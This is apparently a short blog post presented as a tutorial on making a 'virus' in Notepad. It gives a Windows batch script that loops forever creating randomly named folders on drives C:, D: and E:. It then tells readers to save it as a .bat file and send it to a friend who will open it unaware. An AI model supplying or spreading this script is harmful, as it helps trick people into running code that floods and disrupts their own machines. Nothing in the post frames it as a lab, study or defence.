Today I will teach you How to create a simple virus in Notepad. You don’t need any complicated program to create a virus, all you need is Notepad. It’s Best, It’s Free.
Use the code below and paste it in Notepad or Notepad++.
@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
Source
Save this file as a .bat file and then send it to a friend. Many people save all downloaded files on the desktop. So, Now just wait for your friends to open this file. THEY SHOCKED YOU ROCKED.
No comments:
Post a Comment